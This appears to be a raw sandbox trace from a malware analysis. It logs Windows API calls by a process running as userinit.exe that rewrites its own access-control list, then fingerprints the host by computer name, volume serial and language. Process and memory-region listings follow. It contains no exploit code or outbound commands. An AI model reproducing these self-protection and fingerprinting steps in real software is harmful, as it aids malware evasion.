[0140.927] LocalFree (hMem=0x606f40) returned 0x0
[0140.928] ConvertStringSidToSidA () returned 0x1
[0140.928] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfc8c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2adfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0140.928] IsValidSid (pSid=0x2adfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0140.928] ConvertSidToStringSidA () returned 0x1
[0140.928] LocalFree (hMem=0x606f58) returned 0x0
[0140.928] LocalFree (hMem=0x606f40) returned 0x0
[0140.928] ConvertStringSidToSidA () returned 0x1
[0140.928] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfd1c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2adfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0140.928] IsValidSid (pSid=0x2adfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0140.928] ConvertSidToStringSidA () returned 0x1
[0140.928] LocalFree (hMem=0x606f58) returned 0x0
[0140.928] LocalFree (hMem=0x606f40) returned 0x0
[0140.928] GetCurrentProcessId () returned 0x888
[0140.928] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x888) returned 0x1d0
[0140.928] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.928] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0140.928] GetSecurityInfo () returned 0x0
[0140.931] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.931] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0140.931] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x600f28, pControl=0xee572, lpdwRevision=0xee56c | out: pControl=0xee572, lpdwRevision=0xee56c) returned 1
[0140.931] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.931] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0140.931] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x600f28, pOwner=0xee568, lpbOwnerDefaulted=0xee55c | out: pOwner=0xee568*=0x0, lpbOwnerDefaulted=0xee55c) returned 1
[0140.931] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.932] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0140.932] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x600f28, pGroup=0xee568, lpbGroupDefaulted=0xee55c | out: pGroup=0xee568*=0x0, lpbGroupDefaulted=0xee55c) returned 1
[0140.932] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.932] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0140.932] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x600f28, lpbDaclPresent=0xee560, pDacl=0xee554, lpbDaclDefaulted=0xee55c | out: lpbDaclPresent=0xee560, pDacl=0xee554, lpbDaclDefaulted=0xee55c) returned 1
[0140.932] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.932] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0140.932] IsValidAcl (pAcl=0x600f3c) returned 1
[0140.932] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.932] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0140.932] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x0, pAce=0xee3f4 | out: pAce=0xee3f4*=0x600f44) returned 1
[0140.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adfe74, pSourceSid=0x600f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2adfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.932] IsValidSid (pSid=0x2adfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.932] ConvertSidToStringSidA () returned 0x1
[0140.932] LocalFree (hMem=0x607018) returned 0x0
[0140.932] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x1, pAce=0xee3f4 | out: pAce=0xee3f4*=0x600f5c) returned 1
[0140.932] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2adff60, pSourceSid=0x600f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2adff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.932] IsValidSid (pSid=0x2adff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.932] ConvertSidToStringSidA () returned 0x1
[0140.932] LocalFree (hMem=0x607018) returned 0x0
[0140.933] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x2, pAce=0xee3f4 | out: pAce=0xee3f4*=0x600f70) returned 1
[0140.933] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ad29c0, pSourceSid=0x600f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2ad29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0140.933] IsValidSid (pSid=0x2ad29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0140.933] ConvertSidToStringSidA () returned 0x1
[0140.933] LocalFree (hMem=0x607018) returned 0x0
[0140.933] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.933] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0140.933] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x600f28, lpbSaclPresent=0xee564, pSacl=0xee558, lpbSaclDefaulted=0xee55c | out: lpbSaclPresent=0xee564, pSacl=0xee558, lpbSaclDefaulted=0xee55c) returned 1
[0140.933] LocalFree (hMem=0x600f28) returned 0x0
[0140.933] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.933] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.933] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0140.933] GetLengthSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.933] GetLastError () returned 0x0
[0140.933] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.933] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0140.934] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.934] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0140.934] InitializeAcl (in: pAcl=0x607fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x607fa8) returned 1
[0140.934] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.934] GetLengthSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.934] GetLastError () returned 0x0
[0140.934] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.934] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.934] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0140.934] SetLastError (dwErrCode=0x0)
[0140.934] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.934] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0140.934] GetSidSubAuthorityCount (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2adf615
[0140.934] GetLastError () returned 0x0
[0140.935] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.935] SetLastError (dwErrCode=0x0)
[0140.935] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.935] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0140.935] GetSidIdentifierAuthority (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2adf616
[0140.935] GetLastError () returned 0x0
[0140.935] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.935] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.935] SetLastError (dwErrCode=0x0)
[0140.935] GetSidSubAuthorityCount (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2adf615
[0140.935] GetLastError () returned 0x0
[0140.935] SetLastError (dwErrCode=0x0)
[0140.935] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.935] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0140.935] GetSidSubAuthority (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2adf61c
[0140.935] GetLastError () returned 0x0
[0140.935] IsValidSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.935] GetLengthSid (pSid=0x2adf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.936] GetLastError () returned 0x0
[0140.936] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.936] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0140.936] AddAce (in: pAcl=0x607fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x5f2f90, nAceListLength=0x14 | out: pAcl=0x607fa8) returned 1
[0140.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.936] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0140.936] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.936] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0140.936] SetSecurityInfo () returned 0x0
[0140.936] CloseHandle (hObject=0x1d0) returned 1
[0140.937] GetComputerNameA (in: lpBuffer=0x2adfd84, nSize=0xee82c | out: lpBuffer="CRH2YWU7", nSize=0xee82c) returned 1
[0140.937] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.937] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.937] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee720, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.937] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.937] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee720, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.938] VirtualAlloc (lpAddress=0x2ae0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ae0000
[0140.938] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.938] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.938] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.938] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.938] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.939] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.939] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.939] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.939] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.940] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.940] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.940] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.940] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee814, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee828, lpMaximumComponentLength=0xee824, lpFileSystemFlags=0xee820, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee828*=0x90c08a66, lpMaximumComponentLength=0xee824*=0xff, lpFileSystemFlags=0xee820*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.940] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee718, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.940] GetSystemDefaultLangID () returned 0x5e0409
[0140.940] VerLanguageNameA (in: wLang=0x409, szLang=0xee7cc, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0140.941] ExitProcess (uExitCode=0x0)
Thread:
id = 268
os_tid = 0x878
Thread:
id = 269
os_tid = 0x4f4
Process:
id = "40"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be2e0"
os_pid = "0x180"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Thread:
id = 270
os_tid = 0x480
Process:
id = "41"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be800"
os_pid = "0x734"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4566
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4567
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4568
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4569
start_va = 0x150000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 4570
start_va = 0x3f0000
end_va = 0x3f8fff
entry_point = 0x3f0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 4571
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 4572
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4573
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4574
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 4575
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 4576
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 4578
start_va = 0x610000
end_va = 0x70ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 4579
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4580
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4581
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4582
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4583
start_va = 0x350000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 4584
start_va = 0x6d720000
end_va = 0x6d7a3fff
entry_point = 0x6d720000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 4585
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4586
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4587
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
